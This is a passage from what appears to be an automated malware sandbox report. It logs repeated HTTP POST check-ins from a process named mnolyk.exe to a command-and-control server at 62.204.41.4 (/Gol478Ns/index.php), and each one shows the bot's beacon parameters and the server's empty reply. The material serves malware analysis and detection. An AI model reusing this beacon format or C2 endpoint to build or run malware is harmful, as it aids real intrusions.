                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      106192.168.2.74983162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:25.110774040 CET544OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:25.174256086 CET545INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      107192.168.2.74983262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:25.351768970 CET545OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:25.414864063 CET546INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      108192.168.2.74983362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:25.603473902 CET546OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:25.668282032 CET547INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      109192.168.2.74983462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:25.833187103 CET548OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:25.896348000 CET548INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      11192.168.2.74973562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:00.278414965 CET442OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:00.341404915 CET443INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      110192.168.2.74983562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:26.067780972 CET549OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:26.131688118 CET549INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      111192.168.2.74983662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:26.304985046 CET550OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:26.368634939 CET550INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      112192.168.2.74983762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:26.550389051 CET550OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:26.612377882 CET551INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      113192.168.2.74983862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:26.789628983 CET552OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:26.853873014 CET552INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      114192.168.2.74983962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:27.025983095 CET553OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:27.091368914 CET553INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      115192.168.2.74984062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:27.290138006 CET554OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:27.353770018 CET554INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      116192.168.2.74984162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:27.522197008 CET555OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:27.586823940 CET555INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      117192.168.2.74984262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:27.765216112 CET556OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:27.829616070 CET556INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      118192.168.2.74984362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:28.008838892 CET557OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:28.074860096 CET557INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      119192.168.2.74984462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:28.246222019 CET558OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:28.308918953 CET558INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      12192.168.2.74973662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:00.525448084 CET444OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:00.590553045 CET444INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      120192.168.2.74984662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:28.476052046 CET565OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:28.537834883 CET566INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      121192.168.2.74984762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:28.712472916 CET566OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:28.774358988 CET567INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      122192.168.2.74984862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:28.944538116 CET567OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:29.009571075 CET568INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      123192.168.2.74984962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:29.177906036 CET568OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
